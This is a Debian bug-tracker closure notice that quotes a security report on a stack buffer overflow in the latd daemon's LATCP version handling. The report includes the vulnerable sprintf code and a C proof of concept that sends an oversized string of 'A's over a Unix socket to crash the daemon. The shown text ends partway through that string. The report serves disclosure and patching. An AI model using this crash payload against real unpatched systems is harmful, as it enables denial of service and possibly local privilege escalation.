Your message dated Mon, 04 Feb 2013 12:17:29 +0000
with message-id <e1u2kzj-0006tu...@franck.debian.org>
and subject line Bug#699625: fixed in latd 1.31
has caused the Debian Bug report #699625,
regarding unix socket privilege escalation
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
699625: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699625
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: latd
Version: 1.30
Severity: critical
Tags: security



-- System Information:
Debian Release: 7.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages latd depends on:
ii  libc6        2.13-37
ii  libgcc1      1:4.7.2-5
ii  liblockdev1  1.0.3-1.5
ii  libstdc++6   4.7.2-5

latd recommends no packages.

latd suggests no packages.

-- no debconf information




latd has a buffer overflow vulnerability @ llogincircuit.cc

    case LATCP_VERSION:
        if (strcmp(VERSION, (char*)cmdbuf) == 0)
        {
            state = RUNNING; // Versions match
            send_reply(LATCP_VERSION, VERSION, -1);
        }
        else
        {
            char error[1024];
            debuglog(("Connect from invalid llogin version %s\n", cmdbuf));
            sprintf(error, "llogin version %s does not match latd version " VERSION, cmdbuf); //***** overflow here


This vulnerability can trigger arbitrary code execution for an unprivileged
user. I am attaching an example payload that crashes the latd daemon.
#include <stdio.h>
#include <string.h>     /* strcpy, strlen */
#include <unistd.h>     /* write */
#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <stdlib.h>

/* Frame one LATCP command: a 3-byte header (command byte, length high byte,
   length low byte) followed by len bytes of body. */
int send_msg(int fd, int cmd, char *buf, int len)
{
    unsigned char outhead[3];

    outhead[0] = cmd;
    outhead[1] = len/256;
    outhead[2] = len%256;
    if (write(fd, outhead, 3) != 3) return 0;
    if (write(fd, buf, len) != len) return 0;

    return 1;
}

int main()
{
    int s = socket( PF_UNIX, SOCK_STREAM, 0 );
    struct sockaddr_un sockaddr;
    /* crash payload: one long run of 'A' (wrapped by the mail client in the
       original report; joined here via adjacent string-literal concatenation) */
    const char* str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
                      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA